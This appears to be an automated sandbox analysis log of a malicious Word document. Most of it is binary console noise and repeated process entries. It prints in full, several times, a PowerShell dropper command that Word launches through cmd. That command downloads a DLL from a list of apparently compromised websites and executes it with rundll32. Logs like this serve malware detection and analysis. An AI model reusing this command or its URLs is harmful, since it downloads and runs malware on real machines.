Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Hxk....XM..............................}..v.....M......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Ixk......M.............................}..v.....T......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Hxk....XU..............................}..v.....U......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................Ixk......M.............................}..v.....\......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................Hxk....X]..............................}..v.....]......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................Ixk......M.............................}..v.....d......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................Hxk....Xe..............................}..v.....e......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....l......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....Xm..............................}..v.....m......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....t......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....Xu..............................}..v.....u......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....|......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....X}..............................}..v.....}......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....X...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0.......................h.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....H.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....H.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....x.......0...............8.M.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....0...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....(.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........Ixk......M.............................}..v............0...............8.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....p...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Jqxk......M.............................}..v....p&!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk....('!.............................}..v.....'!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Jqxk......M.............................}..v....H.!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk...../!.............................}..v...../!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.6.7.1.............}..v.....3!.....0.................M.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk....H4!.............................}..v.....4!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Jqxk......M.............................}..v.....;!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk....H<!.............................}..v.....<!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............Jqxk......M.............................}..v.....C!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............*pxk....HD!.............................}..v.....D!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............Jqxk......M.............................}..v.....K!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............*pxk....HL!.............................}..v.....L!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............Jqxk......M.............................}..v.....S!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............*pxk....HT!.............................}..v.....T!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............Jqxk......M.............................}..v.....[!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............*pxk....H\!.............................}..v.....\!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............Jqxk......M.............................}..v.....c!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............*pxk....Hd!.............................}..v.....d!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............Jqxk......M.............................}..v.....k!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............*pxk....Hl!.............................}..v.....l!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............Jqxk......M.............................}..v.....s!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............*pxk....Ht!.............................}..v.....t!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............Jqxk......M.............................}..v.....z!.....0.......................h.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............*pxk.....z!.............................}..v....8{!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Jqxk......M.............................}..v......!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk......!.............................}..v....8.!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .t.e.r.B.i.n.d.i.n.g.E.x.c.e.p.t.i.o.n.....}..v....X.!.....0.................M.....,.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk......!.............................}..v......!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Jqxk......M.............................}..v....X.!.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk......!.............................}..v......!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .n.d.s...I.n.v.o.k.e.E.x.p.r.e.s.s.i.o.n.C.o.m.m.a.n.d.....0.................M.....<.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk......!.............................}..v......!.....0...............X.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......Jqxk......M.............................}..v......!.....0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*pxk....P.!.............................}..v......!.....0...............X.M.............................
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$1711.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD7E7.tmpJump to behavior
Source: classification engineClassification label: mal84.expl.winDOC@5/13@0/0
Source: 1711.docOLE document summary: title field not present or empty
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~DFF0F57547FC904286.TMP.0.drOLE document summary: title field not present or empty
Source: ~DFF0F57547FC904286.TMP.0.drOLE document summary: author field not present or empty
Source: ~DFF0F57547FC904286.TMP.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.427339359.0000000002A67000.00000004.00000040.sdmp
Source: ~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Obfuscated command line foundShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Suspicious powershell command line foundShow sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
